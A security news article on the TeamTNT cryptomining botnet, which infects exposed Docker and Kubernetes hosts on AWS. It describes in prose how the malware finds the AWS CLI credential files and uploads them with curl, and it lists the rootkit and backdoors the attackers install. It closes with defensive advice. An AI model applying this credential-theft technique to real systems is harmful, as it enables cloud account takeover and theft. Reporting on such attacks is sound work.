Cryptomining Botnet Steals AWS Credentials

A crypto-mining botnet is stealing Amazon Web Services credentials from infected servers.

The TeamTNT botnet targets misconfigured Docker and Kubernetes systems running on top of AWS servers, and then scans the underlying infected servers for any hard-coded AWS credentials, security firm Cade Security said said. The malware, which installs Monero cryptominers on the infected systems, has been actively targeting Docker installations since April, according to Trend Micro.

The research team used MoneroOcean, one of the mining pools used by the attackers, to compile a list of 119 compromised systems across AWS, Kubernetes clusters, and Jenkins build servers.

“It is likely we will see other worms start to copy the ability to steal AWS Credentials files too.”

The botnet scans for open and accessible Docker and Kubernetes systems, and infects them with malware. Once on the infected system, the bot can look for exposed user credentials on the underlying AWS infrastructure. In this case, it is looking for ~/.aws/credentials and ~/.aws/config directories where AWS Command Line Interface (CLI) typically stores unencrypted files containing credentials and configuration details. Once found, the files are copied and uploaded to the attacker’s command-and-control server using curl.

“The code to steal AWS credentials is relatively straightforward – on execution it uploads the default AWS credentials and config files to the attackers’ server,” Cado Security said.

Once the infrastructure has been compromised, the bot sets up its own containers to mine Monero cryptocurrency and to scan for additional Docker and Kubernetes servers. Attackers install a number of other malicious tools, as well, including a SSH post-exploitation script called punk.py, a log cleaning tool, the Diamorphine rootkit, and the Tsunami IRC backdoor.

These kinds of cryptojacking attacks are particularly expensive for organizations, as attackers are taking advantage of their infrastructure’s processing resources to mine for cryptocurrencies.

Researchers sent credentials created by CanaryTokens.org to the command-and-control server, but said they have not yet seen those credentials in use. Many of stolen credentials appear to not have been used, as of Aug 17, but that doesn’t mean they will never be used. The attackers may be manually using those credentials slowly, reselling on the black market, or still trying to figure out how to automate how to use those credentials.

“Whilst these attacks aren’t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems,” Cado Security said.

Crypto-mining campaigns frequently borrow techniques and code from each other. In this case, TeamTNT copied code from another worm called Kinsing. Cado Security said other worms could start stealing AWS credentials, as well.

“It is likely we will see other worms start to copy the ability to steal AWS Credentials files too,” Cado Security said.

While there have been a number of malware campaigns targeting Docker and Kubernetes systems, and attacks looking for hard-coded or forgotten credentials, this AWS-specific functionality is new, said Cado Security. Firewall rules can limit access to Docker APIs, and it is safer to whitelist systems that should be allowed access. Network administrators should also review network traffic to look for signs the credential files are being transferred over HTTP. Businesses should identify which systems are storing AWS credential files and delete them if they aren’t in use.

“It’s common to find development credentials have accidentally been left on production systems,” Cado Security said.